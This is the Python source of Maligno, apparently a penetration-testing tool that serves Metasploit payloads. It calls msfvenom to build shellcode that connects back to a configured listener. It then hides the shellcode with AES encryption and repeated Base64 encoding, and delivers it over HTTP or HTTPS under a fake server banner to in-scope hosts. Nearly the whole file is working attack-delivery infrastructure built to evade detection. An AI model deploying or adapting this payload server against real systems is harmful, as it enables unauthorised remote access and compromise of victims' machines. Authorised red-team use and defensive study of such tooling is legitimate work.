#!/usr/bin/python

################################################################
#                                                              #
# Maligno - A Metasploit payload server                        #
# written by Juan J. Guelfo @ Encripto AS                      #
# post@encripto.no                                             #
#                                                              #
# Copyright 2013-2014 Encripto AS. All rights reserved.        #
#                                                              #
# Maligno is licensed under the FreeBSD license.               #
# http://www.freebsd.org/copyright/freebsd-license.html        #
#                                                              #
################################################################



import re, os, base64, subprocess, ConfigParser, sys, ipcalc, ssl, time
from Crypto.Cipher import AES
from datetime import datetime
from urlparse import urlparse, parse_qs
from BaseHTTPServer import BaseHTTPRequestHandler
from BaseHTTPServer import HTTPServer


__version__ = "1.0"
__author__ = "Juan J. Guelfo, Encripto AS (post@encripto.no)"


# Prints title and other header info
def header():
    os.system("clear")
    
    print ""
    print " ================================================================= "
    print "|  Maligno v{0}: A Metasploit payload server\t\t\t  |".format(__version__)
    print "|  by {0}\t\t  |".format(__author__)
    print " ================================================================= "
    print ""

    
# Imports server configuration and does a few basic checks
def get_server_config(config_file):
    config_variables = [
        "msfpath", "msfpayload", "msflhost", "msfbadchars", 
        "msflport", "msfencoder", "msfiterations", 
        "msfcachefile", "base64rounds", "blocksize", 
        "paddingchar", "secret", "scope", "srvaddr", "srvport", 
        "ssl", "sslcert", "banner", "reqparam", "useragent"
        ]

    config = ConfigParser.ConfigParser()
    config.readfp(open(config_file))
    
    server_config = config.items("Metasploit")
    server_config += config.items("Encryption")
    server_config += config.items("Scope")
    server_config += config.items("Server")
            
    for e in server_config:
        if e[0] not in config_variables:
            print "\n[-] Server config variable duplicated or not recognized: {0}\n".format(e[0])
            sys.exit()
        
        if not e[1]:
            print "\n[-] Server config variable is empty: {0}\n".format(e[0])
            sys.exit()
        
        config_variables.remove(e[0])
    
    if config_variables:
        print "\n[-] Server config variables are missing: {0}".format(str(config_variables).strip("[]").replace("'", ""))
        sys.exit()
    
    return dict(x[0:] for x in reversed(server_config))


# Gets and expands the scope defined in the server config
def get_scope_from_server_config(server_config):
    config = server_config["scope"].replace(' ', '').split(',')
    scope = []
    
    for ip in config:
        if ip.find("/") > -1:
            for c in ipcalc.Network(ip):
                scope.append(str(c))
        else:
            scope.append(ip)
    
    return scope


# Gets the Metasploit payloads defined in the server config
def get_payloads_from_server_config(server_config):
    return server_config["msfpayload"].replace(' ', '').split(',')


# Encrypts a plaintext with AES, and encodes the results with rounds of Base64
def pack_data(shellcode, block_size, padding_char, cipher, encoding_rounds):
    plaintext = shellcode + ":" + str(block_size) + ":" + padding_char
    padded = plaintext + (block_size - len(plaintext) % block_size) * padding_char
    ciphertext = cipher.encrypt(padded)
    
    for i in range(0, encoding_rounds):
        ciphertext = base64.b64encode(ciphertext)
    
    return ciphertext


# Decodes and decrypts a Base64 encoded / AES encrypted ciphertext
def unpack_data(ciphertext, block_size, padding_char, cipher, encoding_rounds):
    for i in range(0, encoding_rounds):
        ciphertext = base64.b64decode(ciphertext)
    
    return cipher.decrypt(ciphertext).rstrip(padding_char)


# Generates a payload with msfvenom
def generate_shellcode(
        msf_path, msf_payload, msf_lhost, msf_lport, msf_encoder, msf_bad_chars, msf_iterations):
       
    p = subprocess.Popen("%smsfvenom -p %s LHOST=%s LPORT=%s EXITFUNC=thread -e %s -i %s -f c -b '%s'" % 
        (msf_path, msf_payload, msf_lhost, msf_lport, msf_encoder, msf_iterations, msf_bad_chars), stdout=subprocess.PIPE, shell=True)
        
    s = p.communicate()[0].split("unsigned char buf[] = ")[1]
    
    return s.replace("\n", "").replace('"', "").replace(";", "").replace("+", "").replace(" ", "").rstrip()
       
    

# Stores an encrypted / encoded payload in cache
def store_package_in_cache(cache_file, default_file, package):
    try:
        fw = open(cache_file, 'w')
        fw.write(package)
        fw.close()
        
        if not os.path.isfile(default_file):
            fw = open(default_file, 'w')
            fw.write(package)
            fw.close()
        
    except IOError:
        print "[-] Could not store package in cache."
    
    return
    

# Reads an encrypted / encoded payload from cache
def read_package_from_cache(cache_file):
    package = ""
    try:
        fr = open(cache_file, 'r')
        package = fr.readline()
        fr.close()
    
    except IOError:
        print "[-] Could not find {0}.".format(cache_file)
    
    return package
   
    
class GetHandler(BaseHTTPRequestHandler):

    def do_GET(self):
        
        # Set server version (banner)
        self.server_version = server_config["banner"]
        self.sys_version = ""
        
        # Display incoming request
        print "==================================================================="
        print "\n[{0}]".format(datetime.now().strftime("%d/%m/%y - %H:%M:%S"))
        print "\n[*] New request from {0}...".format(self.client_address[0])
        
        # If the request came from a host in scope, then process it
        if (self.client_address[0] in scope) or ("ANY" in scope):
            try:
                
                # The server should process requests with a certain URL parameter
                query = urlparse(self.path).query
                payload_id = int(dict(q.split("=") for q in query.split("&")).get(server_config["reqparam"]))
                
                # Select cache file 
                cache_file = str(payload_id) + "-" + server_config["msfcachefile"]
                if os.path.isfile(cache_file):
                    print "[+] Requested payload OK..."
                
                # Uses the first (default) generated payload if not found
                else:
                    cache_file = default_file
                    print "[-] Requested payload not found. Using default payload instead..."
                    
                # Retrieve from cache    
                package = ""
                print "\n[*] Reading packed shellcode from {0}...".format(cache_file)
                package = read_package_from_cache(cache_file) 
                
                # Send the encrypted / encoded payload to the client
                print ""
                self.send_response(200)
                self.send_header("Content-type", "text/html")
                self.end_headers()
                self.wfile.write(package)
                print "\n[+] Package sent!"
                
            except ValueError:                
                print "[-] Request with unexpected format. Ignoring it..."
            
        else:
            print "\n[-] Host not in scope!\n"
            self.send_response(200)
            self.end_headers()
        
        print "\n[*] End of request\n"
        print "==================================================================="
        return


if __name__ == '__main__':
    
    # Read config, generate payloads and start server
    header()

    server_config = get_server_config("server.conf")
    scope = get_scope_from_server_config(server_config)
    payloads = get_payloads_from_server_config(server_config)    
    cipher = AES.new(server_config["secret"])
    
    generated = 0
    for i in range(len(payloads)):
       
        print "[*] Generating and caching shellcodes: {0} of {1}...".format(i+1, len(payloads)) 
        payload_generated = False
        while not payload_generated:
        
            try:
                # Generate payload
                print "[*] Generating {0} with msfvenom...\n".format(payloads[i])
                shellcode = generate_shellcode(server_config["msfpath"], 
                                                payloads[i], 
                                                server_config["msflhost"], 
                                                server_config["msflport"], 
                                                server_config["msfencoder"],
                                                server_config["msfbadchars"],
                                                server_config["msfiterations"])
                        
                # Encrypt and encode the payload
                package = ""
                package = pack_data(shellcode, 
                                    int(server_config["blocksize"]), 
                                    server_config["paddingchar"], 
                                    cipher, 
                                    int(server_config["base64rounds"]))
                        
                # Store the encrypted / encoded payload for later use
                cache_file = str(i) + "-" + server_config["msfcachefile"]
                default_file = "default-" + server_config["msfcachefile"]
                store_package_in_cache(cache_file, default_file, package)
                payload_generated = True
                generated += 1
                
            except IndexError:
                c = ""
                options = ["Y", "N", "y", "n"]
                while c not in options:
                    time.sleep(0.5)
                    
                    print "\n[-] There was a problem generating the payload with msfvenom."
                    c = raw_input("[*] Would you like to retry? [Y/N]: ")
                    
                    if c == "N" or c == "n":
                        payload_generated = True
                    
                    elif c == "Y" or c == "y":
                        print ""
        
        header()

        
    print "[*] Starting Maligno..."
    
    if not generated:
        print "[-] No shellcode has been generated."
        print "[-] Maligno cannot continue without shellcodes.\n"
        print "[-] Tip: Too many errors with msfvenom?"
        print "[-] Try to reduce the number of iterations and/or bad chars in your config file.\n"
        sys.exit()
    
   
    try:
        server = HTTPServer(('', int(server_config["srvport"])), GetHandler)
        
        # If ssl is enabled, try to locate the SSL cert file
        if server_config["ssl"] == "true" or server_config["ssl"] == "True":
            cert = open(server_config["sslcert"], 'r')
            cert.close()
            print "\n[*] SSL certificate file found. SSL enabled..."
            server.socket = ssl.wrap_socket (server.socket, certfile=server_config["sslcert"], server_side=True)
        
        print "[*] Maligno is up and running. Press CTRL+C to stop...\n"
        server.serve_forever()
    
    except ValueError:
        print "[-] A valid port must be provided in server config.\n"
        sys.exit()
        
    except IOError as e:
        if e.errno == 2:
            print "[-] Could not find SSL certificate file: {0}.\n".format(server_config["sslcert"])
            
        else:
            print "[-] Error: {0}...\n".format(e.strerror)
            
        sys.exit()

    except KeyboardInterrupt: 

        # Remove cache files when interrupted
        print "\n[*] Removing cache files..."
        filelist = [ f for f in os.listdir(".") if f.endswith(server_config["msfcachefile"]) ]
        for f in filelist:
            os.remove(f)
            
        print "[*] Stopping Maligno...\n"
        sys.exit()